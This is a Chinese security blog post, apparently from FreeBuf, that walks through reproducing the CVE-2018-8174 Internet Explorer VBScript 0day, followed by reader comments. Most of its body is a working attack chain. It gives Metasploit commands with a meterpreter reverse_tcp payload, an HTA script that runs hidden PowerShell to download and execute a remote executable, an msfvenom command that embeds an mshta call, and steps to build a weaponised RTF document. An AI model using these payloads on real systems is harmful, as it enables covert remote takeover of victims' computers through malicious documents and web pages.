CVE-2018-8174 “双杀”0day漏洞复现

最近360核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用0day漏洞的APT攻击，捕获到了全球首例利用浏览器0day漏洞的新型Office文档攻击，我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招，最终被黑客植入后门木马完全控制电脑。

了解更多 http://www.freebuf.com/articles/paper/171254.html

POC验证

未打补丁系统，IE浏览器打开此地址会弹出计算器 。

http://test.lr3800.com/CVE-2018-8174_PoC.html

metasploit 复现

下载 metasploit 模块到本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

将CVE-2018-8174.rb复制到 fileformat 目录

cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

将CVE-2018-8174.rtf复制到 exploits 目录

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

启动 metasploit

use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116
exploit

复制 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开
或者IE浏览器打开 http://192.168.0.116:8080 即可获得会话

自定义下载者 复现

利用 mshta 从远程服务器下载文件执行。

请先下载poc附件，下文中使用 链接：https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg 密码：ci8h

1.构造HTA文件，当访问hta文件就会触发powershell下载文件至临时目录执行

准备你的xx.exe文件上传至站点目录，假如得到地址 http://xxx.com/xxx.exe

HTA代码：

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://xxx.com/xxx.exe\', \'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close();
</script>

把该文件命名 8174.hta 上传至站点目录；假如得到地址 http://xxx.lr3800.com/8174.hta

2.使用msfvenom生成 js Shellcode

msfvenom -p windows/exec cmd='mshta http://xxx.lr3800.com/8174.hta' -f js_le exitfunc=thread -a x86

把生成的Shellcode字符替换至 8174poc.html 166行代码

把 8174poc.html 文件上传至站点目录 假如得到地址 http://xxx.lr3800.com/8174poc.html

3.生成Word文档

* 下载python脚本保存本地

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

运行 CVE-2018-8174.py

python CVE-2018-8174.py -u http://xxx.lr3800.com/8174poc.html -o exp.rtf

得到目录中的 “exp.rtf ”文件，使用Word文档打开即可下载执行xx.exe文件，或者IE浏览器打开 http://xxx.lr3800.com/8174poc.html 即可下载执行xx.exe文件

样本演示运行效果 https://app.any.run/tasks/3c52b2b2-3fb7-42ff-a3bf-14429b17b112

lr3800_ 6 篇文章 等级： 4级

|

|

• 上一篇：Pwn2Own华为HiApp漏洞原理与利用分析（下）
• 下一篇： 腾讯御见捕获Flash 0day漏洞（CVE-2018-5002）野外攻击

这些评论亮了

• 
  不当大哥很多年 回复
  周六还发文章，肯定没有女朋友。
  ) 9 ( 亮了

发表评论

已有 8 条评论

• 

  不当大哥很多年  2018-06-09 回复 1楼

  周六还发文章，肯定没有女朋友。

  亮了( 8)
  • 

    安安全全狗狗  2018-06-09 回复

    @ 不当大哥很多年 周六还看文章 你也没有女朋友

    亮了( 1)
• 

  若为自由故二者皆可抛  (1级) 这家伙太懒了，还未填写个人描述！  2018-06-09 回复 2楼

  我想问一下，刚才我点了一下那个网址，应该没事吧，不会已经中招了吧

  亮了( 1)
• 

  lr3800_  (4级) 安全猎人 lr3800.com  2018-06-09 回复 3楼

  @ 不当大哥很多年 你找到我的漏洞了，我想尽快找个女票打补丁

  亮了( 0)
• 

  cwg2552298  (6级) Follow my own course  2018-06-10 回复 4楼

  我被弹 计算器了

  亮了( 0)
• 

  1521815837  2018-06-10 回复 5楼

  那种系统没有office wps的飘过

  亮了( 0)
• 

  houjingyi  (3级)  2018-06-10 回复 6楼

  天天发这些复现的有什么意义，教大家metasploit的使用么？我一天能写100篇出来。

  亮了( 0)
  • 

    lr3800_  (4级) 安全猎人 lr3800.com  2018-06-10 回复

    @ houjingyi  键盘侠，来来来，你每天写100篇。你可以选择不看，直接关闭该页面。

    亮了( 0)